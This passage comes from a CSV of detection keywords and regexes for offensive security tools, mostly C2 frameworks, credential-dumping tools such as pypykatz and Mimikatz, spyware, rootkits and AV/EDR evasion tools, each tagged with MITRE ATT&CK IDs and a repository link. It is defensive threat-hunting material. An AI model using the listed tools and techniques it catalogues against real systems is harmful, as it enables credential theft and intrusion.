TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*import pypykatz*",".{0,1000}import\spypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*import saint.email.SendEmail*",".{0,1000}import\ssaint\.email\.SendEmail.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*import saint.screenshot.Screenshot*",".{0,1000}import\ssaint\.screenshot\.Screenshot.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*import saint.webcam.Cam*",".{0,1000}import\ssaint\.webcam\.Cam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*import ShadowForgeHome*",".{0,1000}import\sShadowForgeHome.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*import Stager*",".{0,1000}import\sStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Import stealed session to Chromium..*",".{0,1000}Import\sstealed\ssession\sto\sChromium\.\..{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*import udmp_parser*",".{0,1000}import\sudmp_parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*import wapiti*",".{0,1000}import\swapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*import wfuzz*",".{0,1000}import\swfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*import*autorecon.config*",".{0,1000}import.{0,1000}autorecon\.config.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*import*autorecon.plugins*",".{0,1000}import.{0,1000}autorecon\.plugins.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*import/nessus/*",".{0,1000}import\/nessus\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*import/nexpose*",".{0,1000}import\/nexpose.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*import_msf_web*",".{0,1000}import_msf_web.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ImportDll::GetAsyncKeyState*",".{0,1000}ImportDll\:\:GetAsyncKeyState.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Import-DllImports -PEInfo *",".{0,1000}Import\-DllImports\s\-PEInfo\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Import-DllImports*",".{0,1000}Import\-DllImports.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Import-Module *Microsoft.ActiveDirectory.Management.dll*",".{0,1000}Import\-Module\s.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","0","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*Import-Module DSInternals*",".{0,1000}Import\-Module\sDSInternals.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*improsec/SharpEventPersist*",".{0,1000}improsec\/SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*In medium integrity but user is a local administrator- UAC can be bypassed*",".{0,1000}In\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*In memory of all those murdered in the Nova party massacre 7.10.2023*",".{0,1000}In\smemory\sof\sall\sthose\smurdered\sin\sthe\sNova\sparty\smassacre\s7\.10\.2023.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Inactive Domain Admins Honey Tokens*",".{0,1000}Inactive\sDomain\sAdmins\sHoney\sTokens.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*inceptor*POWERSHELL*",".{0,1000}inceptor.{0,1000}POWERSHELL.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*inceptor.py *",".{0,1000}inceptor\.py\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*inceptor/obfuscators*",".{0,1000}inceptor\/obfuscators.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*inceptor-main.zip*",".{0,1000}inceptor\-main\.zip.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*include ""MSFRottenPotato.h""*",".{0,1000}include\s\""MSFRottenPotato\.h\"".{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*include ""prefetch_leak.h""*",".{0,1000}include\s\""prefetch_leak\.h\"".{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*include ""ThrowbackDLL.h""*",".{0,1000}include\s\""ThrowbackDLL\.h\"".{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*include *Nidhogg.hpp*",".{0,1000}include\s.{0,1000}Nidhogg\.hpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*include beacon.h*",".{0,1000}include\sbeacon\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*include injection.c*",".{0,1000}include\sinjection\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*include*bofmask.h*",".{0,1000}include.{0,1000}bofmask\.h.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*incognito* list_tokens -u*",".{0,1000}incognito.{0,1000}\slist_tokens\s\-u.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*incognito.exe*",".{0,1000}incognito\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*infection_monkey.py*",".{0,1000}infection_monkey\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*InflativeLoading.py *",".{0,1000}InflativeLoading\.py\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*InflativeLoading-DumpPEFromMemory*",".{0,1000}InflativeLoading\-DumpPEFromMemory.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense 